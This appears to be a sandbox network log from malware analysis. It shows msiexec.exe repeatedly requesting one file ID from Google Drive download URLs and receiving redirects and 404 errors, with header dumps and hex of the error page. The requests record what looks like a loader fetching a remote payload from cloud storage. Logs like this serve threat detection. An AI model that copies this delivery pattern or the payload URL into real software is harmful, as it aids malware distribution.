                                                                  2025-01-10 14:17:38 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 61 62 56 6a 42 51 32 6d 45 48 74 79 42 44 34 61 51 70 49 4d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7abVjBQ2mEHtyBD4aQpIMg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  68192.168.2.550044142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:39 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:40 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:39 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-pitqKJOHtF7UY7tEp8znCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  69192.168.2.550045142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:40 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:41 UTC1844INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFiumC4XLnev6bK1Dh37NhGUjDwdd-DUHFqBzp2aVeeX_n3h8DUNBt4XD4D2ohznx88wqHVR
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:40 GMT
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy: script-src 'nonce-pZZTc7RoMSYoYqj6mryZXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:17:41 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 41 4b 39 4f 62 2d 44 70 34 48 58 4a 50 4d 79 4e 6d 31 6d 71 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qAK9Ob-Dp4HXJPMyNm1mqA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  70192.168.2.550046142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:41 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:42 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:42 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-_pdFc2xz_LETzjMyybCLKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  71192.168.2.550047142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:43 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:43 UTC1844INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFIdbgRsYHJskFjAxNQO27zjZHRmUx79GThTLu2mBjTRsP3myLseb_a3P44WyZ_qn5eM9mir
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:43 GMT
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-D3-rv8GaQoI25b8pFR4evw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:17:43 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 55 6a 5f 58 5a 56 73 35 6b 48 54 6d 38 45 73 4a 6a 65 78 43 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sUj_XZVs5kHTm8EsJjexCQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  72192.168.2.550048142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:44 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:44 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:44 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy: script-src 'nonce-1sW79x9dX57xpkn2RsPGAA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  73192.168.2.550049142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:45 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:45 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFiumC4cr7db1X7EW6dRIhZK2eF3mNhdqlhonf8w-xC1osuVmTzAtbksU7R9VeJoE6Don1xt250mUOw
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:45 GMT
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-Jf1Leol0nNHC3TyWppTHkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:17:45 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 42 4a 59 71 63 4f 66 65 55 4a 74 57 36 45 56 52 37 50 42 6a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9BJYqcOfeUJtW6EVR7PBjw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  74192.168.2.550050142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:46 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:46 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:46 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy: script-src 'nonce-tkq4EPIMSsbRLnmSzHpkVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  75192.168.2.550051142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:47 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:48 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFiumC5Zy5JIsSxWpyXufA5mrywHjOVb2IjU98HUaEceBzebwP_8RlNSsNCjtm-OCSPEnZeXVKaT-DI
                                                                  Content-Type: text/html; charset=utf-8
